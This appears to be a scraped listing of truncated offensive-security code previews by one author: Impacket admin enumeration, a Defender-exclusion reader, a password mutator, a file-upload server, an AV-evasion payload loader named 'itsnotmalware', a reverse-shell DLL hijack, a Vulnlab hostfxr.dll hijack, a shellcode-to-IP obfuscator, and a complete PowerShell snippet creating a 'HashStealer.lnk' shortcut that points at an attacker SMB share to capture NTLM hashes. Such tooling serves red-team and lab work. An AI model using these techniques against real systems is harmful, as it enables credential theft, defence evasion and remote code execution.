caueb

#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
#

caueb

function Get-DefenderExclusions {
    param (
        [string]$LogName = "Microsoft-Windows-Windows Defender/Operational",
        [int]$EventID = 5007
    )

    # Get all event logs with the specified Event ID efficiently
    $events = Get-WinEvent -FilterHashtable @{LogName=$LogName; Id=$EventID}

    # Filter events that contain the word "Exclusions"

caueb

#!/usr/bin/env python3
"""
- Combine 2 different words
- Combine 2 different words and capitalize the first word
- Combine 2 different words and capitalize the second word
- Combine 2 different words and convert both to uppercase (optional)
- Combine 2 different words and mutate into leet speak (optional)
- Combine 2 different words, mutate into leet speak, and convert to uppercase (optional)
- Combine 3 different words
- Combine 3 different words and capitalize the first word

caueb

#!/usr/bin/env python

"""Extend Python's built in HTTP server to save files

curl or wget can be used to send files with options similar to the following

  curl -X PUT --upload-file somefile.txt http://localhost:8000
  wget -O- --method=PUT --body-file=somefile.txt http://localhost:8000/somefile.txt

__Note__: curl automatically appends the filename onto the end of the URL so

caueb

// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell)
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe

#include "Windows.h"
#include "stdio.h"
#include <iostream>
#include <string>
#include <regex>

#define _CRT_SECURE_NO_WARNINGS

caueb

// Create the project as DLL, compile it, and just rename it file.cpl
// Simply double click in the file to run

#include <Windows.h>

__declspec(dllexport) LONG CALLBACK CPlApplet(HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2) {
    MessageBoxA(NULL, "Test", "Caption", MB_OK);
    return 1;
}

caueb

// Compile with MingW: x86_64-w64-mingw32-gcc-win32 reverse.c -shared -lws2_32 -o Hijack.dll.deploy

#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <process.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

caueb

$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("$env:USERPROFILE\\Desktop\\HashStealer.lnk")
$shortcut.TargetPath = '\\\\192.168.150.134\\tools\\app.ico'
$shortcut.Save()

caueb

// Vulnlab: Bruno
// DLL Hijack of hostfxr.dll

#include <winsock2.h>
#include <stdio.h>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(lib, "ws2_32")

caueb

from ipaddress import ip_address
import sys

if len(sys.argv) < 2:
    print("Usage: %s <shellcode_file>" % sys.argv[0])
    sys.exit(1)

with open(sys.argv[1], "rb") as f:
    chunk = f.read(4)
    ip_addresses = []